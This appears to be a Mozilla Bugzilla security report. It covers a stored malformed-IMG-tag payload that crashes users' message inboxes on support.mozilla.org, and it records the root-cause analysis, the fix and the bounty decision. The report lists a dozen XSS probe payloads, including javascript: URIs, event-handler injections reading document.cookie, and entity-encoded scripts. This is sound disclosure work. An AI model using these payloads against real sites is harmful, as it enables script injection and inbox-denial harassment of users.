Closed Bug 1762414 Opened 3 years ago Closed 3 years ago

Malformed injected <IMG> tag crashes Messages Inbox Web support.mozilla.org

Categories

(support.mozilla.org :: General, defect)

defect

Tracking

(Not tracked)

RESOLVED FIXED

People

(Reporter: alisyarief.404, Assigned: lmcardle)

References

()

Details

(Keywords: reporter-external, sec-high, wsec-dos, Whiteboard: [reporter-external] [web-bounty-form] [verif?])

Attachments

(1 file)

Payload XSS (minor) to Crash Messages Inbox

  1. Log in to the website https://support.mozilla.org/
  2. Go to https://support.mozilla.org/id/messages/new
  3. Send a message to the victim account with the payload below:
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
\<a onmouseover="alert(document.cookie)"\>xxs link\</a\>
\<a onmouseover=alert(document.cookie)\>xxs link\</a\>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
  4. After sending, the victim's Messages menu crashes and shows the notification alert:

An Error Occurred
Oh, no! It looks like an unexpected error occurred. We've already notified the site administrators. Please try again now, or in a few minutes.

  5. This is not a denial-of-service attack or rate limiting, because this payload impacts only users of support.mozilla.org

Impact :

The New Messages menu on support.mozilla.org can send to every user account, so an attacker can send the crashing payload to all user accounts on support.mozilla.org, and no user can open the Messages menu at https://support.mozilla.org/id/messages/

Supporting Material/References:

Because the proof-of-concept video file is too big, I uploaded it to YouTube with the setting not public:

https://youtu.be/IHAByCLG5Xg

Thanks

Flags: sec-bounty?
Attached file File Payload XSS —

Hello Kang,

Thank you for your report.

Do you mean that when you send a message to a user with this payload, support.mozilla.org is no longer responsive? Was the XSS payload executed?

For reference, we prefer that testing not be done on the support production instance, as mentioned in our scope: https://www.mozilla.org/en-US/security/bug-bounty/web-eligible-sites/. Please use the staging instance for testing: https://support.allizom.org/en-US/

Thanks,
Frida

Yes, the XSS payload was not executed, but after sending the payload to the victim,
the victim's Messages menu crashes and cannot be opened (error).
Details of the PoC are in the YouTube link.

I think in this web scope https://www.mozilla.org/en-US/security/bug-bounty/web-eligible-sites/
the Support domain support.mozilla.org is listed under Eligible Websites & Services,
so I tested the subdomain support.mozilla.org.

After your request, I tested the subdomain https://support.allizom.org/en-US/; I think this vulnerability is the same as on support.mozilla.org,
because after the attacker sends the payload in a message to the victim, the victim cannot access the Messages menu and gets the error notification.
This is dangerous if the attacker sends it to all user accounts on support.mozilla.org: no user can open the Messages menu,
because by default the Messages menu can send a message to any user account.

This is the video PoC link for the subdomain https://support.allizom.org/en-US/:

https://youtu.be/G1u5TVBTih8 (not public)

Thanks

If it is required for testing,
can you send me a username/account on the support.mozilla.org website for me to test with?

Thanks

support.mozilla.org is the eligible site but we have a note under the listing to request testing in the staging instance instead of production so we don't create invalid content or disrupt users.

You can self-register on the staging instance, why do you need us to send you a username?

Sorry if it is not polite to ask for the user.
I just think that if this finding necessitates a PoC,
I can test.

Are these findings eligible for a bounty?

I was able to validate your other reports and will try to reproduce this one too.

Unfortunately, denial of service reports are not eligible for bounty as we mention in the exclusions section in the program policy: https://www.mozilla.org/en-US/security/web-bug-bounty/. We might consider awarding hall of fame mention depending on the report.

Thanks,
Frida

Type: task → defect
Summary: Paylod XSS (minor) to Crash Messages Inbox Web support.mozilla.org → Malformed injected <IMG> tag crashes Messages Inbox Web support.mozilla.org

I can confirm that sending a message with the payload <IMG SRC="jav&#x0A;ascript:alert('XSS');"> crashes the inbox of the receiver as well as the sent messages page for the sender.

Status: UNCONFIRMED → NEW
Component: Other → General
Ever confirmed: true
Keywords: wsec-dos
Product: Websites → support.mozilla.org
See Also: → 1762422

Hello Leo, Hello Tasos,

Can you please check this report? There seems to be an issue with parsing malformed HTML when displaying messages which contain the mentioned payload. It is not necessarily a security issue but it is a serious issue which can be abused to deny access to users' inboxes.

Thanks,
Frida

Flags: needinfo?(tasos)
Flags: needinfo?(lmcardle)

Thanks for this report, it seems like our wiki parsing library can't handle hex numeric character references in tag attributes, so something as simple as <img alt="&#x41;"> will cause the error. (Whereas, interestingly, <img alt="&#65;"> won't cause the error, despite referencing the same code point, nor will simply using &#x41; outside of a tag attribute.)

That's something which will be most easily fixed upstream, but before I submit a PR there, I'll ensure we better handle parsing errors so they don't completely crash pages.

Assignee: nobody → lmcardle
Flags: needinfo?(tasos)
Flags: needinfo?(lmcardle)
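As an added illustration (not code from Kitsune or from anyone in this thread) of the per-message error isolation Leo describes: each message is parsed on its own, a parser failure degrades to escaped text instead of crashing the whole inbox, and `decoded_attrs` shows that the hex and decimal forms resolve to the same value once references are decoded. `fragile_parse` is a constructed stand-in for the unnamed wiki library's behaviour and `render_inbox` is hypothetical; the sample messages are constructed.

```python
import html
import re
from html.parser import HTMLParser

# Constructed stand-in for the wiki-markup library the bug describes: it fails on
# hex numeric character references inside tag attributes but accepts decimal ones.
def fragile_parse(text: str) -> str:
    if re.search(r'<[^>]*=\s*["\']?[^>]*&#[xX][0-9a-fA-F]+;', text):
        raise ValueError("unhandled hex character reference in attribute")
    return text


class _AttrDecoder(HTMLParser):
    """Collect start-tag attributes; HTMLParser decodes &#x41; and &#65; identically."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        self.attrs.update({k.lower(): (v or "") for k, v in attrs})


def decoded_attrs(fragment: str) -> dict:
    """Return attribute name -> decoded value for the tags in a fragment."""
    p = _AttrDecoder()
    p.feed(fragment)
    p.close()
    return p.attrs


def render_inbox(messages, parse=fragile_parse):
    """Render each message in isolation (hypothetical): a message the parser
    cannot handle is shown as escaped text rather than raising and taking the
    whole inbox page down with it."""
    rendered = []
    for body in messages:
        try:
            rendered.append(parse(body))
        except Exception:  # parser bug or malformed markup: degrade, do not crash
            rendered.append("<pre>%s</pre>" % html.escape(body))
    return rendered


if __name__ == "__main__":
    # Constructed sample inbox: one plain message, the hex form, the decimal form.
    for line in render_inbox(['hi <b>there</b>', '<img alt="&#x41;">', '<img alt="&#65;">']):
        print(line)
```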

Sounds good. Thanks, Leo.

Has it been fixed?
Can I retest now?

The pull requests are still not merged; you can retest when we mark the bug as RESOLVED FIXED to verify the fix.

Thanks,
Frida

Oh, okay.
Thanks, Frida

The fix was deployed to staging, and the issue is fixed there. Leaving the bug open until the changes are deployed to production.

Thanks for the update.

Is this report eligible for a bounty?

Thanks

After the issue is fixed and deployed to production, the bug bounty panel meets to discuss bounties; we will let you know our decision then.

Thanks,
Frida

The fix has been released to prod.

Status: NEW → RESOLVED
Closed: 3 years ago
Resolution: --- → FIXED

Normally "denial of service" bugs are not eligible, but this bug can be used for targeted harassment of users, and it would not be obvious to the site operators that an attack was going on based on normal monitoring, so it could continue for a bit longer than normal external DoS attacks. We have therefore decided to treat this (and the symptoms in bug 1762422) as a kind of "XSS (minor)", since it does involve injecting stored content.

Flags: sec-bounty? → sec-bounty+

Thanks for fixing this bug,
and thanks a lot for the bounty.

Thanks very much

Hello Kang,

Thank you again for your report. Please let us know how you would like to be mentioned in our hall of fame.

Thanks,
Frida

Group: websites-security

Hello Frida,

Please enter my profile:

Name: Ali Syarief (@kang_ali)

Thanks

Keywords: sec-high